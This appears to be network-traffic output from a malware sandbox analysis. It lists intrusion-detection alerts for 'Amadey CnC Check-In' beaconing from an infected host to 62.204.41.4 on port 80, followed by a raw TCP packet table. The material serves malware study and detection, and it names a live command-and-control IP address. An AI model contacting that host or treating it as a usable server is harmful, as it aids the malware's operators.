                                                        192.168.2.562.204.41.449697802027700 02/06/23-14:16:30.331432TCP2027700ET TROJAN Amadey CnC Check-In4969780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450026802027700 02/06/23-14:18:19.334487TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450067802027700 02/06/23-14:18:29.442348TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450263802027700 02/06/23-14:19:22.314339TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449754802027700 02/06/23-14:16:59.800602TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449852802027700 02/06/23-14:17:30.586454TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450082802027700 02/06/23-14:18:34.947434TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450206802027700 02/06/23-14:19:06.573238TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449951802027700 02/06/23-14:17:59.351611TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449939802027700 02/06/23-14:17:56.379898TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450022802027700 02/06/23-14:18:18.367475TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449905802027700 02/06/23-14:17:46.099037TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450196802027700 02/06/23-14:19:04.123385TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450066802027700 02/06/23-14:18:29.146657TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450173802027700 02/06/23-14:18:58.637896TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449816802027700 02/06/23-14:17:21.645116TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450262802027700 02/06/23-14:19:22.073797TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449793802027700 02/06/23-14:17:12.843598TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450084802027700 02/06/23-14:18:35.437223TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449882802027700 02/06/23-14:17:40.393565TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450257802027700 02/06/23-14:19:20.856195TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449704802027700 02/06/23-14:16:32.045624TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449923802027700 02/06/23-14:17:50.412938TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449971802027700 02/06/23-14:18:04.128227TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450127802027700 02/06/23-14:18:45.946491TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449727802027700 02/06/23-14:16:43.531561TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450168802027700 02/06/23-14:18:57.456115TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450038802027700 02/06/23-14:18:22.237631TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450234802027700 02/06/23-14:19:15.265931TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449745802027700 02/06/23-14:16:57.611373TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450216802027700 02/06/23-14:19:10.901301TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449834802027700 02/06/23-14:17:26.192657TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450050802027700 02/06/23-14:18:25.142675TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450180802027700 02/06/23-14:19:00.308509TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450186802027700 02/06/23-14:19:01.729093TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450183802027700 02/06/23-14:19:01.029659TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450094802027700 02/06/23-14:18:37.890736TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450275802027700 02/06/23-14:19:25.216519TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449803802027700 02/06/23-14:17:18.396345TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450097802027700 02/06/23-14:18:38.635757TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450015802027700 02/06/23-14:18:16.703906TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449974802027700 02/06/23-14:18:04.837734TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449977802027700 02/06/23-14:18:05.552322TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450247802027700 02/06/23-14:19:18.456525TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449714802027700 02/06/23-14:16:34.963073TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449885802027700 02/06/23-14:17:41.119392TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450155802027700 02/06/23-14:18:54.353665TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449888802027700 02/06/23-14:17:41.840855TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449806802027700 02/06/23-14:17:19.119476TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449799802027700 02/06/23-14:17:17.417286TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450244802027700 02/06/23-14:19:17.729582TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449717802027700 02/06/23-14:16:38.110725TCP2027700ET TROJAN Amadey CnC Check-In4971780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449908802027700 02/06/23-14:17:46.800738TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450040802027700 02/06/23-14:18:22.709350TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450199802027700 02/06/23-14:19:04.853144TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449796802027700 02/06/23-14:17:16.378790TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450158802027700 02/06/23-14:18:55.072147TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450028802027700 02/06/23-14:18:19.806368TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450069802027700 02/06/23-14:18:30.250801TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449920802027700 02/06/23-14:17:49.692974TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449831802027700 02/06/23-14:17:25.452284TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450219802027700 02/06/23-14:19:11.621916TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449701802027700 02/06/23-14:16:31.297623TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449742802027700 02/06/23-14:16:53.631837TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450012802027700 02/06/23-14:18:15.955153TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449819802027700 02/06/23-14:17:22.395201TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449949802027700 02/06/23-14:17:58.849591TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450142802027700 02/06/23-14:18:50.911528TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450101802027700 02/06/23-14:18:39.586156TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450272802027700 02/06/23-14:19:24.480080TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450231802027700 02/06/23-14:19:14.506549TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.562.204.41.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Feb 6, 2023 14:16:29.577439070 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.577461958 CET804969362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.577547073 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.577590942 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.585295916 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.646075964 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.649504900 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.653402090 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.763591051 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.764683008 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.824440956 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.825571060 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.826432943 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.826551914 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.833365917 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.894077063 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.896542072 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.896730900 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.015897036 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.016649961 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.077560902 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.077868938 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.081624031 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.081865072 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.082324028 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.145374060 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.151854992 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.153008938 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.267267942 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.268034935 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.330276012 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.330461025 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.330821991 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.330940008 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.331432104 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.396003008 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.398885965 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.399019003 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.513561964 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.514549017 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.575536013 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.575699091 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.576133013 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.579301119 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.579402924 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.636229992 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.639316082 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.639472961 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.748692989 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.750433922 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.809381962 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.809444904 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.810801983 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.810889959 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.811357975 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.874603033 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.874645948 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.874768972 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.982218981 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.982970953 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.042591095 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.042728901 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.043292046 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.043406963 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.043766975 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.124670029 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.124840975 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.124898911 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.232711077 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.233705044 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.293167114 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.293382883 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.296154022 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.296464920 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.297622919 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.359807968 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.362792015 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.362927914 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.482449055 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.483194113 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.543910980 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.544033051 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.544042110 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.544162035 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.544826984 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.605264902 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.609515905 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.609659910 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.720773935 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.721662998 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.781966925 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.782066107 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.783037901 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.783169031 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.801911116 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.863517046 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.868216991 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.868396997 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.982759953 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.983603001 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.045079947 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.045178890 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.045177937 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.045264006 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.045624018 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.108331919 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.117239952 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.117358923 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.253287077 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.261163950 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.316380978 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.317768097 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.322765112 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.322890043 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.323528051 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.383878946 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.386897087 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.389538050 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.500999928 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.501689911 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.561602116 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.561858892 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.561966896 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.562031031 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.563263893 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.624953985 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.627523899 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.629777908 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.732887983 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.733944893 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.792391062 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.792474031 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.796664000 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.797704935 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.799134016 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.861947060 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.866416931 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.866545916 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.983104944 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.984055042 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.046968937 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.047508955 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.047919035 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.050724030 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.050820112 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.107681990 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.112329960 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.113776922 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.223474979 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.224272966 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.283612013 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.283751965 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.286875010 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.287100077 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.287571907 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.350275040 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.353867054 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.354121923 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.466859102 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.467489958 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.533123970 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.533155918 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.533293009 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.533334017 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.533909082 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.597686052 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.601789951 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.601977110 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.717964888 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.719047070 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.780078888 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.780221939 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.780905008 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.780977964 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.781092882 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.840681076 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.843689919 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.843822956 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.035156965 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.036046982 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.095686913 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.095779896 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.104942083 CET804971262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.105112076 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.380434036 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.443031073 CET804971262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.447359085 CET804971262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.447457075 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.566401005 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.567195892 CET4971380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.628118038 CET804971362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.628336906 CET4971380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.629647970 CET804971262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.629777908 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.634243011 CET4971380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.695442915 CET804971362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.698781967 CET804971362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.698959112 CET4971380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.857948065 CET4971380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.858820915 CET4971480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.918611050 CET804971362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.918756008 CET4971380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.920150995 CET804971462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.920285940 CET4971480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.963073015 CET4971480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.023448944 CET804971462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:35.026926041 CET804971462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:35.027054071 CET4971480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.176768064 CET4971480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.177650928 CET4971580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.237788916 CET804971462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:35.237957001 CET4971480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.238209009 CET804971562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:35.238301992 CET4971580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.302871943 CET4971580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:35.363466978 CET804971562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:35.368762016 CET804971562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:35.369009018 CET4971580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.031475067 CET4971580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.032350063 CET4971680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.091893911 CET804971562.204.41.4192.168.2.5
